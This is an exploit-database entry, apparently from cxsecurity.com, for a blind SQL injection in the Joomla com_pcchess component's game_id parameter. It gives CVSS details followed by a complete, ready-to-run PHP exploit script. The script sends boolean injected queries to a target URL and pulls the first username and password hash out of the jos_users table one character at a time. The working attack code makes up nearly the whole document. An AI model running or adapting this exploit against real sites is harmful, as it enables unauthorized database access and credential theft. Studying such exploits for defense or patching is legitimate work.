Joomla com_pcchess (game_id) Blind SQL Injection Exploit

2009.02.05
Credit: Cyb3R-1st
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php ini_set("max_execution_time",0); print_r(' ############################################################################## # # Joomla com_pcchess (game_id) Blind SQL Injection Exploit # # === Cyb3R-1st === # cyb3r-1st@hormail.com # == inject0r5 t3am == # # usegae : php file.php "http://site/index.php?option=com_pcchess&Itemid=84&page=showgame&game_id=1" # ############################################################################## '); if ($argc > 1) { $url = $argv[1]; $r = strlen(file_get_contents($url."+and+1=1--")); echo "\nExploiting:\n"; $w = strlen(file_get_contents($url."+and+1=0--")); $t = abs((100-($w/$r*100))); echo "Username: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } echo "\nPassword: "; for ($j = 1; $j <= 49; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top